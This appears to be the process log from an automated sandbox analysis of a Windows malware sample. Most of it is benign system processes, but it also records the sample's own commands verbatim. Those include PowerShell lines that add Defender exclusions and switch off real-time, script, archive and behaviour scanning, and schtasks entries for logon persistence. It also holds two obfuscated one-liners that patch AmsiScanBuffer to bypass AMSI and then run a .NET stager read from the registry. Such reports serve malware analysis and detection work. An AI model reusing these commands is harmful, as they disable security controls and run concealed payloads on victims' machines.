PID 5072 wrote to memory of 1596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe

"C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\x69.exe

C:\Users\Admin\AppData\Roaming\x69.exe

C:\Users\Admin\AppData\Roaming\x69.exe

"C:\Users\Admin\AppData\Roaming\x69.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe

C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe

"C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'

C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe

C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe

C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe

C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe

C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe

C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\923E.tmp\923E.tmp\924F.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\923D.tmp\923E.tmp\923F.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe

C:\Users\Admin\AppData\Roaming\x69install.exe

"C:\Users\Admin\AppData\Roaming\x69install.exe"

C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe

C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Users\Admin\AppData\Roaming\x69install.exe

C:\Users\Admin\AppData\Roaming\x69install.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XCSObrhMeeUn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SapZSXApSQnrTi,[Parameter(Position=1)][Type]$AXluPOHCfj)$CkvqYvcfzUz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+'l'+''+'e'+'c'+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+'yM'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+[Char](108)+'e'+'g'+''+[Char](97)+''+'t'+''+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+'u'+'b'+'l'+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$CkvqYvcfzUz.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+'pec'+[Char](105)+''+'a'+'l'+[Char](78)+'a'+'m'+'e'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+[Char](66)+''+'y'+''+'S'+'i'+'g'+''+[Char](44)+''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$SapZSXApSQnrTi).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+'d'+'');$CkvqYvcfzUz.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+'k'+[Char](101)+'',''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+'S'+[Char](105)+'g,'+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+'t'+''+'u'+''+'a'+'l',$AXluPOHCfj,$SapZSXApSQnrTi).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+'e,'+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $CkvqYvcfzUz.CreateType();}$sjdZEOUNECYEv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+'t'+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+'3'+'2'+''+[Char](46)+''+[Char](85)+'n'+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'ve'+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+'s');$THiMqbLdIIHaor=$sjdZEOUNECYEv.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+','+[Char](83)+''+'t'+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YaZdFpGSsHHOGhbMcyV=XCSObrhMeeUn @([String])([IntPtr]);$suxPoEWZUqxVzFzRoNBuug=XCSObrhMeeUn @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pfJAWDkfzYl=$sjdZEOUNECYEv.GetMethod(''+[Char](71)+''+'e'+'tM'+'o'+''+[Char](100)+''+'u'+'l'+'e'+''+[Char](72)+'a'+[Char](110)+''+'d'+'le').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2'+'.'+'dl'+[Char](108)+'')));$maqyCpVvRCihqS=$THiMqbLdIIHaor.Invoke($Null,@([Object]$pfJAWDkfzYl,[Object](''+[Char](76)+''+'o'+''+'a'+''+'d'+'Li'+'b'+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$hxXUZdrWInlLHMJfp=$THiMqbLdIIHaor.Invoke($Null,@([Object]$pfJAWDkfzYl,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l'+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$vASedcL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($maqyCpVvRCihqS,$YaZdFpGSsHHOGhbMcyV).Invoke(''+[Char](97)+''+'m'+''+'s'+'i'+'.'+''+[Char](100)+'ll');$VtnUpISSTDJzQCDtN=$THiMqbLdIIHaor.Invoke($Null,@([Object]$vASedcL,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'iSca'+'n'+'B'+'u'+''+'f'+'fe'+[Char](114)+'')));$hshDbGxLox=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxXUZdrWInlLHMJfp,$suxPoEWZUqxVzFzRoNBuug).Invoke($VtnUpISSTDJzQCDtN,[uint32]8,4,[ref]$hshDbGxLox);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VtnUpISSTDJzQCDtN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxXUZdrWInlLHMJfp,$suxPoEWZUqxVzFzRoNBuug).Invoke($VtnUpISSTDJzQCDtN,[uint32]8,0x20,[ref]$hshDbGxLox);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+'W'+[Char](65)+'R'+'E'+'').GetValue(''+'x'+''+'6'+''+[Char](57)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cFXuWiIZaHuV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$eQAPyQEdrnOwzb,[Parameter(Position=1)][Type]$guBhPbZNND)$ocobqWggrjF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+'e'+'a'+'l'+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+'C'+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oCl'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$ocobqWggrjF.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+'i'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$eQAPyQEdrnOwzb).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+'M'+[Char](97)+'na'+[Char](103)+'e'+[Char](100)+'');$ocobqWggrjF.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+'e','Pu'+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+[Char](121)+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+'wS'+[Char](108)+''+[Char](111)+''+'t'+''+','+''+'V'+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$guBhPbZNND,$eQAPyQEdrnOwzb).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $ocobqWggrjF.CreateType();}$EZRJZXMFBeDOk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+[Char](101)+'m'+[Char](46)+''+'d'+'ll')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+''+'3'+'2'+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+'a'+'f'+'e'+''+'N'+''+'a'+''+[Char](116)+'i'+'v'+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$yBnboBprzjikYQ=$EZRJZXMFBeDOk.GetMethod(''+[Char](71)+''+'e'+'tP'+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'tic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$VPGvYHGxnYzvifaRDgT=cFXuWiIZaHuV @([String])([IntPtr]);$RsnhTsiqQuHZRuAbXoZkWV=cFXuWiIZaHuV @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mRPwSxwZAFc=$EZRJZXMFBeDOk.GetMethod('G'+'e'+''+[Char](116)+''+'M'+'o'+'d'+'u'+'l'+''+[Char](101)+''+[Char](72)+'a'+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'rn'+'e'+''+[Char](108)+'3'+'2'+''+'.'+''+'d'+''+'l'+''+[Char](108)+'')));$WaBoPsgGDqJkpS=$yBnboBprzjikYQ.Invoke($Null,@([Object]$mRPwSxwZAFc,[Object](''+[Char](76)+''+'o'+'adL'+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$MDnjkVAOZpiPdPyIh=$yBnboBprzjikYQ.Invoke($Null,@([Object]$mRPwSxwZAFc,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+'o'+[Char](116)+'e'+[Char](99)+''+'t'+'')));$qJnGHSp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaBoPsgGDqJkpS,$VPGvYHGxnYzvifaRDgT).Invoke(''+'a'+''+'m'+'si.d'+[Char](108)+''+'l'+'');$jFoarKIuYfnXyuXWB=$yBnboBprzjikYQ.Invoke($Null,@([Object]$qJnGHSp,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+'a'+[Char](110)+'Buf'+'f'+''+[Char](101)+''+'r'+'')));$InwTbBCCVQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MDnjkVAOZpiPdPyIh,$RsnhTsiqQuHZRuAbXoZkWV).Invoke($jFoarKIuYfnXyuXWB,[uint32]8,4,[ref]$InwTbBCCVQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jFoarKIuYfnXyuXWB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MDnjkVAOZpiPdPyIh,$RsnhTsiqQuHZRuAbXoZkWV).Invoke($jFoarKIuYfnXyuXWB,[uint32]8,0x20,[ref]$InwTbBCCVQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](120)+''+[Char](54)+'9'+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -MAPSReporting 0"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -MAPSReporting 0"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

